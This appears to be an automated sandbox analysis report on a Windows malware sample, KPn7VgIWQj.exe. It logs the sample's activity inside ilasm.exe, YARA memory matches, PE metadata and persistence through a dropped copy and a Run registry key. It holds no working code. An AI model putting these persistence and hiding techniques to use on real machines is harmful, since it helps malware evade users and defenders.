Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Section loaded: atiadlxy.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: KPn7VgIWQj.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: KPn7VgIWQj.exe Static file information: File size 4060850 > 1048576
Source: KPn7VgIWQj.exe Static PE information: Raw size of .managed is bigger than: 0x100000 < 0x14c200
Source: KPn7VgIWQj.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x12fc00
Source: KPn7VgIWQj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KPn7VgIWQj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KPn7VgIWQj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KPn7VgIWQj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KPn7VgIWQj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KPn7VgIWQj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: KPn7VgIWQj.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: KPn7VgIWQj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Nqzffhk.pdb source: ilasm.exe, 00000006.00000002.3913939775.00000203FCE70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: ilasm.exe, 00000006.00000002.3896869499.00000203980D0000.00000004.08000000.00040000.00000000.sdmp
Source: KPn7VgIWQj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KPn7VgIWQj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KPn7VgIWQj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KPn7VgIWQj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KPn7VgIWQj.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Source: 6.2.ilasm.exe.203980d0000.5.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 6.2.ilasm.exe.203980d0000.5.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 6.2.ilasm.exe.203980d0000.5.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 6.2.ilasm.exe.203980d0000.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 6.2.ilasm.exe.203980d0000.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 6.2.ilasm.exe.20398070000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3758077873.0000020380001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3895274604.0000020398070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ilasm.exe PID: 7180, type: MEMORYSTR
Source: KPn7VgIWQj.exe Static PE information: section name: .managed
Source: KPn7VgIWQj.exe Static PE information: section name: _RDATA
Source: KPn7VgIWQj.exe.0.dr Static PE information: section name: .managed
Source: KPn7VgIWQj.exe.0.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Code function: 0_2_00007FF68BBEFEBC push 83480000h; ret 0_2_00007FF68BBEFEC4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC6B1620 push ebp; iretd 6_2_00007FFAAC6B1628
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Code function: 6_2_00007FFAAC6A6F60 pushad ; iretd 6_2_00007FFAAC6A6F8D
Source: C:\Users\user\KPn7VgIWQj.exe Code function: 8_2_00007FF72A65FEBC push 83480000h; ret 8_2_00007FF72A65FEC4
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe File created: C:\Users\user\KPn7VgIWQj.exe Jump to dropped file
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe File created: C:\Users\user\KPn7VgIWQj.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe File created: C:\Users\user\KPn7VgIWQj.exe Jump to dropped file
Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KPn7VgIWQj Jump to behavior
Source: C:\Users\user\Desktop\KPn7VgIWQj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KPn7VgIWQj Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
